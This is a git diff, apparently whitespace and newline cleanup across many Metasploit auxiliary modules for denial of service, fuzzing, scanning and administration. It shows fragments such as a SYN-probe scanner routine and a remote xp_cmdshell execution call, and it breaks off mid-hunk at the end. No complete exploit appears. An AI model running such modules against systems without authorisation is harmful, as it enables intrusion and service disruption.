diff --git a/modules/auxiliary/admin/backupexec/dump.rb b/modules/auxiliary/admin/backupexec/dump.rb index 4cb4624eb4..ef1fd41e0d 100644 --- a/modules/auxiliary/admin/backupexec/dump.rb +++ b/modules/auxiliary/admin/backupexec/dump.rb @@ -282,4 +282,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/backupexec/registry.rb b/modules/auxiliary/admin/backupexec/registry.rb index 9e1c8c163b..349a804311 100644 --- a/modules/auxiliary/admin/backupexec/registry.rb +++ b/modules/auxiliary/admin/backupexec/registry.rb @@ -280,4 +280,4 @@ class Metasploit3 < Msf::Auxiliary return stub end -end \ No newline at end of file +end diff --git a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb index 90bc95ca29..7a6326b1e9 100644 --- a/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb +++ b/modules/auxiliary/admin/cisco/vpn_3000_ftp_bypass.rb @@ -82,4 +82,4 @@ class Metasploit3 < Msf::Auxiliary end disconnect end -end \ No newline at end of file +end diff --git a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb index 0721efe056..0113341ce3 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_dhost_cookie.rb @@ -87,4 +87,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb index 1afe2be958..70f869dfa1 100644 --- a/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb +++ b/modules/auxiliary/admin/edirectory/edirectory_edirutil.rb @@ -153,4 +153,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end \ No newline at end of file +end diff --git a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb index 9d09c8777d..611862b525 100644 --- a/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb +++ b/modules/auxiliary/admin/http/hp_web_jetadmin_exec.rb @@ -58,4 +58,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb index c4c81362e0..9bf5c0105e 100644 --- a/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb +++ b/modules/auxiliary/admin/http/iomega_storcenterpro_sessionid.rb @@ -64,4 +64,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb index 3d2d89bef3..312158392f 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2009_001.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2009_001.rb @@ -155,4 +155,4 @@ class Metasploit4 < Msf::Auxiliary end -end \ No newline at end of file +end diff --git a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb index b8fed08533..5a9c9b7390 100644 --- a/modules/auxiliary/admin/http/typo3_sa_2010_020.rb +++ b/modules/auxiliary/admin/http/typo3_sa_2010_020.rb @@ -139,4 +139,4 @@ class Metasploit4 < Msf::Auxiliary end -end \ No newline at end of file +end diff --git a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb index 683f2bcb90..7fef9a1edf 100644 --- a/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb +++ b/modules/auxiliary/admin/http/typo3_winstaller_default_enc_keys.rb @@ -208,4 +208,4 @@ class Metasploit4 < Msf::Auxiliary end -end \ No newline at end of file +end diff --git a/modules/auxiliary/admin/mssql/mssql_exec.rb b/modules/auxiliary/admin/mssql/mssql_exec.rb index 94212b5042..9c338000ec 100644 --- a/modules/auxiliary/admin/mssql/mssql_exec.rb +++ b/modules/auxiliary/admin/mssql/mssql_exec.rb @@ -42,4 +42,3 @@ class Metasploit3 < Msf::Auxiliary mssql_xpcmdshell(datastore['CMD'], true) if mssql_login_datastore end end - diff --git a/modules/auxiliary/admin/mssql/mssql_idf.rb b/modules/auxiliary/admin/mssql/mssql_idf.rb index 9c3b0120e8..278fc84034 100644 --- a/modules/auxiliary/admin/mssql/mssql_idf.rb +++ b/modules/auxiliary/admin/mssql/mssql_idf.rb @@ -230,4 +230,3 @@ class Metasploit3 < Msf::Auxiliary disconnect end end - diff --git a/modules/auxiliary/admin/mysql/mysql_enum.rb b/modules/auxiliary/admin/mysql/mysql_enum.rb index 797a2324e9..56d4e7abb4 100644 --- a/modules/auxiliary/admin/mysql/mysql_enum.rb +++ b/modules/auxiliary/admin/mysql/mysql_enum.rb @@ -216,4 +216,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/mysql/mysql_sql.rb b/modules/auxiliary/admin/mysql/mysql_sql.rb index 7612970f53..1f6e839b21 100644 --- a/modules/auxiliary/admin/mysql/mysql_sql.rb +++ b/modules/auxiliary/admin/mysql/mysql_sql.rb @@ -45,4 +45,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/oracle/oracle_login.rb b/modules/auxiliary/admin/oracle/oracle_login.rb index c14fa343fd..34d0111e52 100644 --- a/modules/auxiliary/admin/oracle/oracle_login.rb +++ b/modules/auxiliary/admin/oracle/oracle_login.rb @@ -75,4 +75,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb index 75980f5d48..ce5296b53d 100644 --- a/modules/auxiliary/admin/pop2/uw_fileretrieval.rb +++ b/modules/auxiliary/admin/pop2/uw_fileretrieval.rb @@ -62,4 +62,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end \ No newline at end of file +end diff --git a/modules/auxiliary/admin/smb/check_dir_file.rb b/modules/auxiliary/admin/smb/check_dir_file.rb index ee04adc02c..97c8706f73 100644 --- a/modules/auxiliary/admin/smb/check_dir_file.rb +++ b/modules/auxiliary/admin/smb/check_dir_file.rb @@ -95,5 +95,3 @@ class Metasploit3 < Msf::Auxiliary end end - - diff --git a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb index b466b9db9e..547f40f145 100644 --- a/modules/auxiliary/admin/smb/samba_symlink_traversal.rb +++ b/modules/auxiliary/admin/smb/samba_symlink_traversal.rb @@ -72,4 +72,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/smb/upload_file.rb b/modules/auxiliary/admin/smb/upload_file.rb index d84a7cb3b8..a661994fea 100644 --- a/modules/auxiliary/admin/smb/upload_file.rb +++ b/modules/auxiliary/admin/smb/upload_file.rb @@ -74,4 +74,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb index cd55489b48..3069a4ee88 100644 --- a/modules/auxiliary/admin/tftp/tftp_transfer_util.rb +++ b/modules/auxiliary/admin/tftp/tftp_transfer_util.rb @@ -222,4 +222,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/vmware/poweroff_vm.rb b/modules/auxiliary/admin/vmware/poweroff_vm.rb index 19d53fa7b8..799347b452 100644 --- a/modules/auxiliary/admin/vmware/poweroff_vm.rb +++ b/modules/auxiliary/admin/vmware/poweroff_vm.rb @@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'VMWare Power Off Virtual Machine', 'Description' => %Q{ - This module will log into the Web API of VMWare and try to power off - a specified Virtual Machine.}, + This module will log into the Web API of VMWare and try to power off + a specified Virtual Machine.}, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) @@ -66,10 +66,4 @@ class Metasploit3 < Msf::Auxiliary return end end - - - - - end - diff --git a/modules/auxiliary/admin/vmware/poweron_vm.rb b/modules/auxiliary/admin/vmware/poweron_vm.rb index 44ac100463..6f6632c988 100644 --- a/modules/auxiliary/admin/vmware/poweron_vm.rb +++ b/modules/auxiliary/admin/vmware/poweron_vm.rb @@ -73,4 +73,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/admin/vmware/tag_vm.rb b/modules/auxiliary/admin/vmware/tag_vm.rb index 082dc0f7b8..e77528fa9b 100644 --- a/modules/auxiliary/admin/vmware/tag_vm.rb +++ b/modules/auxiliary/admin/vmware/tag_vm.rb @@ -23,9 +23,10 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'VMWare Tag Virtual Machine', 'Description' => %Q{ - This module will log into the Web API of VMWare and - 'tag' a specified Virtual Machine. It does this by - logging a user event with user supplied text}, + This module will log into the Web API of VMWare and + 'tag' a specified Virtual Machine. It does this by + logging a user event with user supplied text + }, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) @@ -72,9 +73,4 @@ class Metasploit3 < Msf::Auxiliary end end - - - - end - diff --git a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb index 139849e9ba..57275aa783 100644 --- a/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb +++ b/modules/auxiliary/admin/vmware/terminate_esx_sessions.rb @@ -23,8 +23,8 @@ class Metasploit3 < Msf::Auxiliary super( 'Name' => 'VMWare Terminate ESX Login Sessions', 'Description' => %Q{ - This module will log into the Web API of VMWare and try to terminate - user login sessions as specified by the session keys.}, + This module will log into the Web API of VMWare and try to terminate + user login sessions as specified by the session keys.}, 'Author' => ['TheLightCosine '], 'License' => MSF_LICENSE ) @@ -60,8 +60,4 @@ class Metasploit3 < Msf::Auxiliary end end - - - end - diff --git a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb index 4ecc6bac27..16d52a9e09 100644 --- a/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb +++ b/modules/auxiliary/admin/vxworks/apple_airport_extreme_password.rb @@ -114,4 +114,3 @@ class Metasploit3 < Msf::Auxiliary wdbrpc_client_disconnect end end - diff --git a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb index edebc93bb7..f3993482c3 100644 --- a/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb +++ b/modules/auxiliary/admin/vxworks/dlink_i2eye_autoanswer.rb @@ -96,4 +96,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb index d33afe2360..3b9cdaf6ac 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_memory_dump.rb @@ -116,4 +116,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb index 000bfc361a..edc107414d 100644 --- a/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb +++ b/modules/auxiliary/admin/vxworks/wdbrpc_reboot.rb @@ -66,4 +66,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/admin/webmin/file_disclosure.rb b/modules/auxiliary/admin/webmin/file_disclosure.rb index 9b13f8b7d9..989603e83b 100644 --- a/modules/auxiliary/admin/webmin/file_disclosure.rb +++ b/modules/auxiliary/admin/webmin/file_disclosure.rb @@ -84,4 +84,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/analyze/jtr_crack_fast.rb b/modules/auxiliary/analyze/jtr_crack_fast.rb index ed1c27c089..037ae5f7a8 100644 --- a/modules/auxiliary/analyze/jtr_crack_fast.rb +++ b/modules/auxiliary/analyze/jtr_crack_fast.rb @@ -160,4 +160,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/analyze/jtr_mysql_fast.rb b/modules/auxiliary/analyze/jtr_mysql_fast.rb index ab5f1ee2f4..4798a9d8a5 100644 --- a/modules/auxiliary/analyze/jtr_mysql_fast.rb +++ b/modules/auxiliary/analyze/jtr_mysql_fast.rb @@ -158,4 +158,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/bnat/bnat_router.rb b/modules/auxiliary/bnat/bnat_router.rb index 44a4e43d56..49495bf1fd 100644 --- a/modules/auxiliary/bnat/bnat_router.rb +++ b/modules/auxiliary/bnat/bnat_router.rb @@ -153,4 +153,3 @@ class Metasploit3 < Msf::Auxiliary return target_mac end end - diff --git a/modules/auxiliary/bnat/bnat_scan.rb b/modules/auxiliary/bnat/bnat_scan.rb index e74b733301..8a47a3815d 100644 --- a/modules/auxiliary/bnat/bnat_scan.rb +++ b/modules/auxiliary/bnat/bnat_scan.rb @@ -6,7 +6,7 @@ # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. -# http://metasploit.com/ +# http://metasploit.com/ ## require 'msf/core' @@ -36,7 +36,7 @@ class Metasploit3 < Msf::Auxiliary [ 'URL', 'http://www.slideshare.net/claudijd/dc-skytalk-bnat-hijacking-repairing-broken-communication-channels'], ] ) - + register_options( [ OptString.new('PORTS', [true, "Ports to scan (e.g. 22-25,80,110-900)", "21,22,23,80,443"]), @@ -49,42 +49,41 @@ class Metasploit3 < Msf::Auxiliary end def probe_reply(pcap, to) - reply = nil - begin - Timeout.timeout(to) do - pcap.each do |r| - pkt = PacketFu::Packet.parse(r) - next unless pkt.is_tcp? - reply = pkt - break - end - end - rescue Timeout::Error - end - return reply + reply = nil + begin + Timeout.timeout(to) do + pcap.each do |r| + pkt = PacketFu::Packet.parse(r) + next unless pkt.is_tcp? + reply = pkt + break + end + end + rescue Timeout::Error + end + return reply end def generate_probe(ip) - ftypes = %w{windows, linux, freebsd} - @flavor = ftypes[rand(ftypes.length)] - config = PacketFu::Utils.whoami?(:iface => datastore['INTERFACE']) - p = PacketFu::TCPPacket.new(:config => config) - p.ip_daddr = ip - p.tcp_flags.syn = 1 + ftypes = %w{windows, linux, freebsd} + @flavor = ftypes[rand(ftypes.length)] + config = PacketFu::Utils.whoami?(:iface => datastore['INTERFACE']) + p = PacketFu::TCPPacket.new(:config => config) + p.ip_daddr = ip + p.tcp_flags.syn = 1 return p end def run_host(ip) - open_pcap - + to = (datastore['TIMEOUT'] || 500).to_f / 1000.0 p = generate_probe(ip) pcap = self.capture ports = Rex::Socket.portspec_crack(datastore['PORTS']) - + ports.each_with_index do |port,i| p.tcp_dst = port p.tcp_src = rand(64511)+1024 @@ -96,12 +95,11 @@ class Metasploit3 < Msf::Auxiliary capture_sendto(p, ip) reply = probe_reply(pcap, to) next if reply.nil? - - print_status("[BNAT RESPONSE] Requested IP: #{ip} Responding IP: #{reply.ip_saddr} Port: #{reply.tcp_src}") - end - - close_pcap - - end -end + print_status("[BNAT RESPONSE] Requested IP: #{ip} Responding IP: #{reply.ip_saddr} Port: #{reply.tcp_src}") + end + + close_pcap + end + +end diff --git a/modules/auxiliary/crawler/msfcrawler.rb b/modules/auxiliary/crawler/msfcrawler.rb index 5740da02ed..0a109ae700 100644 --- a/modules/auxiliary/crawler/msfcrawler.rb +++ b/modules/auxiliary/crawler/msfcrawler.rb @@ -451,11 +451,3 @@ class BaseParser self.crawler.cinipath end end - - - - - - - - diff --git a/modules/auxiliary/dos/mdns/avahi_portzero.rb b/modules/auxiliary/dos/mdns/avahi_portzero.rb index aec71c5f4e..6c3ad96ca0 100644 --- a/modules/auxiliary/dos/mdns/avahi_portzero.rb +++ b/modules/auxiliary/dos/mdns/avahi_portzero.rb @@ -59,4 +59,3 @@ class Metasploit3 < Msf::Auxiliary print_status("Avahi should be down now") end end - diff --git a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb index cdad5f12db..a15751b505 100644 --- a/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb +++ b/modules/auxiliary/dos/ntp/ntpd_reserved_dos.rb @@ -69,4 +69,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb index 6a4f330447..403e11c6da 100644 --- a/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb +++ b/modules/auxiliary/dos/pptp/ms02_063_pptp_dos.rb @@ -71,4 +71,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end \ No newline at end of file +end diff --git a/modules/auxiliary/dos/scada/beckhoff_twincat.rb b/modules/auxiliary/dos/scada/beckhoff_twincat.rb index 81ef2dbd29..66ac112ce2 100644 --- a/modules/auxiliary/dos/scada/beckhoff_twincat.rb +++ b/modules/auxiliary/dos/scada/beckhoff_twincat.rb @@ -63,7 +63,7 @@ cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 TCATSysSrv+0x14f6a: 00414f6a 66833802 cmp word ptr [eax],2 ds:0023:02a1f9cf=???? 0:016> k -ChildEBP RetAddr +ChildEBP RetAddr WARNING: Stack unwind information not available. Following frames may be wrong. 02a0f7f8 71ab265b TCATSysSrv+0x14f6a 02a0f80c 71ab4a9e WS2_32!Prolog_v1+0x21 @@ -73,4 +73,4 @@ WARNING: Stack unwind information not available. Following frames may be wrong. 02a0f938 71ad303a WS2_32!WSARecvFrom+0x7d 02a0f96c 00414b92 WSOCK32!recvfrom+0x39 02a0f988 00000000 TCATSysSrv+0x14b92 -=end \ No newline at end of file +=end diff --git a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb index fcb42a9d7f..41dedf777d 100644 --- a/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb +++ b/modules/auxiliary/dos/syslog/rsyslog_long_tag.rb @@ -52,4 +52,3 @@ class Metasploit3 < Msf::Auxiliary disconnect_udp end end - diff --git a/modules/auxiliary/dos/tcp/synflood.rb b/modules/auxiliary/dos/tcp/synflood.rb index 48e1790c4e..66594d6bcc 100644 --- a/modules/auxiliary/dos/tcp/synflood.rb +++ b/modules/auxiliary/dos/tcp/synflood.rb @@ -74,4 +74,3 @@ class Metasploit3 < Msf::Auxiliary close_pcap end end - diff --git a/modules/auxiliary/dos/wifi/file2air.rb b/modules/auxiliary/dos/wifi/file2air.rb index 4540f751e8..aa2bdd1008 100644 --- a/modules/auxiliary/dos/wifi/file2air.rb +++ b/modules/auxiliary/dos/wifi/file2air.rb @@ -115,4 +115,3 @@ class Metasploit3 < Msf::Auxiliary frame[16,6] = eton(addr) if addr end end - diff --git a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb index 87eb4168a7..d761d76033 100644 --- a/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb +++ b/modules/auxiliary/dos/windows/browser/ms09_065_eot_integer.rb @@ -165,4 +165,3 @@ bf87c9d9 0f82cf000000 jb win32k!bComputeIDs+0x1be (bf87caae) bf87c9df 8a6702 mov ah,byte ptr [edi+2] <--- the crash above =end - diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb index eb920f9a93..0e45655dee 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_admin_user.rb @@ -51,4 +51,4 @@ class Metasploit3 < Msf::Auxiliary end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb index a7cdf98306..459ec33377 100644 --- a/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb +++ b/modules/auxiliary/dos/windows/ftp/filezilla_server_port.rb @@ -49,4 +49,4 @@ class Metasploit3 < Msf::Auxiliary disconnect end -end \ No newline at end of file +end diff --git a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb index 54e4f0aa3b..249014afe9 100644 --- a/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb +++ b/modules/auxiliary/dos/windows/llmnr/ms11_030_dnsapi.rb @@ -110,4 +110,3 @@ class Metasploit3 < Msf::Auxiliary disconnect_udp end end - diff --git a/modules/auxiliary/dos/windows/nat/nat_helper.rb b/modules/auxiliary/dos/windows/nat/nat_helper.rb index b947dd260a..c67f0845dc 100644 --- a/modules/auxiliary/dos/windows/nat/nat_helper.rb +++ b/modules/auxiliary/dos/windows/nat/nat_helper.rb @@ -57,4 +57,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb index 7282075e97..c9766b1274 100644 --- a/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb +++ b/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb @@ -67,4 +67,3 @@ class Metasploit3 < Msf::Auxiliary client.close end end - diff --git a/modules/auxiliary/dos/windows/tftp/pt360_write.rb b/modules/auxiliary/dos/windows/tftp/pt360_write.rb index cd6b37e5d8..1d9ecc3420 100644 --- a/modules/auxiliary/dos/windows/tftp/pt360_write.rb +++ b/modules/auxiliary/dos/windows/tftp/pt360_write.rb @@ -44,4 +44,3 @@ class Metasploit3 < Msf::Auxiliary disconnect_udp end end - diff --git a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb index bcfa81b0a0..26705bea4d 100644 --- a/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb +++ b/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb @@ -498,4 +498,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/fuzzers/ftp/client_ftp.rb b/modules/auxiliary/fuzzers/ftp/client_ftp.rb index 1cb7f86b6c..00ca0eeb90 100644 --- a/modules/auxiliary/fuzzers/ftp/client_ftp.rb +++ b/modules/auxiliary/fuzzers/ftp/client_ftp.rb @@ -48,13 +48,13 @@ class Metasploit3 < Msf::Auxiliary OptBool.new('EXTRALINE', [ true, "Add extra CRLF's in response to LIST",true]) ], self.class) end - - + + # Not compatible today def support_ipv6? false end - + #--------------------------------------------------------------------------------- def setup diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb index 19459e27d5..8b563acdb3 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_long.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_long.rb @@ -93,4 +93,3 @@ class Metasploit3 < Msf::Auxiliary datastore['URIBASE'] end end - diff --git a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb index 8b75d37051..c975c7ccb1 100644 --- a/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb +++ b/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb @@ -90,4 +90,3 @@ class Metasploit3 < Msf::Auxiliary datastore['URIBASE'] end end - diff --git a/modules/auxiliary/gather/corpwatch_lookup_id.rb b/modules/auxiliary/gather/corpwatch_lookup_id.rb index 319436a43f..54e5bcbab3 100644 --- a/modules/auxiliary/gather/corpwatch_lookup_id.rb +++ b/modules/auxiliary/gather/corpwatch_lookup_id.rb @@ -351,7 +351,7 @@ class Metasploit3 < Msf::Auxiliary print_status("Filing Date: " + filing_date) print_status("10K Filing Form: " + form10k) print_status("SEC 21 Form: " + sec21) - print_status("Company is active filer: " + (is_filer == "1" ? "true" : "false")) + print_status("Company is active filer: " + (is_filer == "1" ? "true" : "false")) } end end diff --git a/modules/auxiliary/gather/dns_enum.rb b/modules/auxiliary/gather/dns_enum.rb index 09626fca63..d33f3fe9e9 100644 --- a/modules/auxiliary/gather/dns_enum.rb +++ b/modules/auxiliary/gather/dns_enum.rb @@ -507,4 +507,3 @@ class Metasploit3 < Msf::Auxiliary end end end - diff --git a/modules/auxiliary/scanner/afp/afp_login.rb b/modules/auxiliary/scanner/afp/afp_login.rb index 4af00c30aa..511c00f8db 100644 --- a/modules/auxiliary/scanner/afp/afp_login.rb +++ b/modules/auxiliary/scanner/afp/afp_login.rb @@ -122,4 +122,4 @@ class Metasploit3 < Msf::Auxiliary end return status end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb index 52ef62015c..1bbdea978e 100644 --- a/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb +++ b/modules/auxiliary/scanner/backdoor/energizer_duo_detect.rb @@ -122,4 +122,3 @@ class Metasploit3 < Msf::Auxiliary end end - diff --git a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb index a76270f40e..50a47887dd 100644 --- a/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb +++ b/modules/auxiliary/scanner/dcerpc/endpoint_mapper.rb @@ -91,4 +91,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb index 1bf3460195..81fff149c1 100644 --- a/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/dcerpc/tcp_dcerpc_auditor.rb @@ -314,4 +314,3 @@ class Metasploit3 < Msf::Auxiliary end - diff --git a/modules/auxiliary/scanner/discovery/udp_probe.rb b/modules/auxiliary/scanner/discovery/udp_probe.rb index ec9ca8025d..dda7d47379 100644 --- a/modules/auxiliary/scanner/discovery/udp_probe.rb +++ b/modules/auxiliary/scanner/discovery/udp_probe.rb @@ -52,7 +52,7 @@ class Metasploit3 < Msf::Auxiliary @probes << 'probe_pkt_db2disco' @probes << 'probe_pkt_citrix' @probes << 'probe_pkt_pca_st' - @probes << 'probe_pkt_pca_nq' + @probes << 'probe_pkt_pca_nq' end @@ -107,13 +107,13 @@ class Metasploit3 < Msf::Auxiliary rescue ::Exception => e print_error("Unknown error: #{@thost}:#{@tport} #{e.class} #{e} #{e.backtrace}") end - + @results.each_key do |k| next if not @results[k].respond_to?('keys') data = @results[k] - + next unless inside_workspace_boundary?(data[:host]) - + conf = { :host => data[:host], :port => data[:port], @@ -121,7 +121,7 @@ class Metasploit3 < Msf::Auxiliary :name => data[:app], :info => data[:info] } - + if data[:hname] conf[:host_name] = data[:hname].downcase end @@ -129,7 +129,7 @@ class Metasploit3 < Msf::Auxiliary if data[:mac] conf[:mac] = data[:mac].downcase end - + report_service(conf) print_status("Discovered #{data[:app]} on #{k} (#{data[:info]})") end @@ -140,7 +140,7 @@ class Metasploit3 < Msf::Auxiliary # The response parsers # def parse_reply(pkt) - + # Ignore "empty" packets return if not pkt[1] @@ -154,7 +154,7 @@ class Metasploit3 < Msf::Auxiliary hname = nil hkey = "#{pkt[1]}:#{pkt[2]}" - + # Work with protocols that return different data in different packets # These are reported at the end of the scanning loop to build state case pkt[2] @@ -162,25 +162,25 @@ class Metasploit3 < Msf::Auxiliary @results[hkey] ||= {} data = @results[hkey] - + data[:app] = "pcAnywhere" data[:port] = pkt[2] data[:host] = pkt[1] case pkt[0] - + when /^NR(........................)(........)/ name = $1.dup - caps = $2.dup + caps = $2.dup name = name.gsub(/_+$/, '').gsub("\x00", '').strip caps = caps.gsub(/_+$/, '').gsub("\x00", '').strip data[:name] = name data[:caps] = caps - + when /^ST(.+)/ buff = $1.dup stat = 'Unknown' - + if buff[2,1].unpack("C")[0] == 67 stat = "Available" end @@ -188,29 +188,28 @@ class Metasploit3 < Msf::Auxiliary if buff[2,1].unpack("C")[0] == 11 stat = "Busy" end - + data[:stat] = stat end - + if data[:name] inf << "Name: #{data[:name]} " end - + if data[:stat] inf << "- #{data[:stat]} " end if data[:caps] inf << "( #{data[:caps]} ) " - end - data[:info] = inf + end + data[:info] = inf end - # Ignore duplicates for the protocols below return if @results[hkey] - + case pkt[2] when 53 @@ -271,7 +270,7 @@ class Metasploit3 < Msf::Auxiliary hname = names[0][0] end end - + @results[hkey] = true when 111 @@ -344,7 +343,7 @@ class Metasploit3 < Msf::Auxiliary app = 'citrix-ica' return unless citrix_parse(pkt[0]) @results[hkey] = true - + end return unless inside_workspace_boundary?(pkt[1]) @@ -513,10 +512,9 @@ class Metasploit3 < Msf::Auxiliary def probe_pkt_pca_st(ip) return ["ST", 5632] end - + def probe_pkt_pca_nq(ip) return ["NQ", 5632] end end - diff --git a/modules/auxiliary/scanner/discovery/udp_sweep.rb b/modules/auxiliary/scanner/discovery/udp_sweep.rb index 8a5774ceae..9f50dc0a65 100644 --- a/modules/auxiliary/scanner/discovery/udp_sweep.rb +++ b/modules/auxiliary/scanner/discovery/udp_sweep.rb @@ 